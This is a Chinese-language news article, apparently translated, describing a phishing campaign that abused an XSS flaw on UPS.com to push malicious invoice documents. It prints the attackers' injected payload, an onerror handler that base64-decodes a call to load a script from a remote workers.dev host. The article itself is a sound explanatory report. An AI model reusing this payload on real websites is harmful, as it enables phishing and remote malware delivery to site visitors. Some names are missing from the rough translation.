資訊專欄INFORMATION COLUMN
摘要:此漏洞允許威脅行為者通過遠程工作人員分發惡意文檔,但使其看起來像是直接從下載的。目前顯示,的跨站漏洞已經修復。而以上釣魚攻擊利用的是中第二普遍的安全問題,存在于近三分之二的應用中。
一個巧妙的網絡釣魚活動利用UPS.com中的XSS漏洞來推送虛假和惡意的“發票”Word%20文檔。
UPS快遞公司(UPS%20Express,聯合包裹服務公司)是世界上最大的快遞承運商與包裹遞送公司。公司創辦1907年,每天在全球200多個國家和地區提供物流服務,年營業額超過500億美元。
網絡釣魚騙局最初是由安全研究人員丹尼爾·加拉格爾發現的,他假裝是一封來自UPS的電子郵件,聲稱一個包裹有“例外”,需要客戶取走。
這次網絡釣魚攻擊的突出之處在于,威脅行為者利用UPS.com的跨站攻擊漏洞,將該網站的常規頁面修改為看起來像一個合法的下載頁面。
此漏洞允許威脅行為者通過遠程Cloudflare工作人員分發惡意文檔,但使其看起來像是直接從UPS.com下載的。
這個電子郵件充滿了大量的合法鏈接,沒有執行惡意行為。然而,這個追蹤號碼是一個鏈接到UPS網站的鏈接,其中包含一個XSS漏洞,當頁面打開時,該漏洞會向瀏覽器注入惡意JavaScript。
UPS 網絡釣魚電子郵件
當前無法加載圖像,因為攻擊者的站點已關閉
下面可以看到用于跟蹤號碼的URL經過清理后的版本,原始的URL被進一步混淆了。
網絡釣魚詐騙中使用的URL
這個URL有兩個有趣的字符串用作攻擊的一部分,其中第一項是以下base64編碼的字符串:
MSBqVTU3IE4zM2QgNzAgbTRLMyA3aDE1IFVSTCA0IGwxNzdsMyBMMG45M3IgNzAgSDFEMyBuM3g3IHFVM3JZIFA0UjRNLCB5MHUgNExSMzREeSBLbjB3IFdoWSA7KQ==
base64字符串包含來自威脅參與者的注釋,該注釋有助于解釋該字符串用于使URL變長,以隱藏附加到URL末尾的XSS利用查詢參數。
1%20jU57%20N33d%2070%20m4K3%207h15%20URL%204%20l177l3%20L0n93r%2070%20H1D3%20n3x7%20qU3rY%20P4R4M,%20y0u%204LR34Dy%20Kn0w%20WhY%20;)
第二點是當用戶訪問UPS.com網站時注入的JavaScript跨站漏洞。
img%20src="x"%20onerror="Function(atob("JC5nZXRTY3JpcHQoJ2h0dHBzOi8vbS5tZWRpYS1hbWF6b24ud29ya2Vycy5kZXYvanMnKQ=="))()
atob()函數中解碼的base64字符串包含Cloudflare工作人員腳本的URL,該漏洞將加載該腳本。
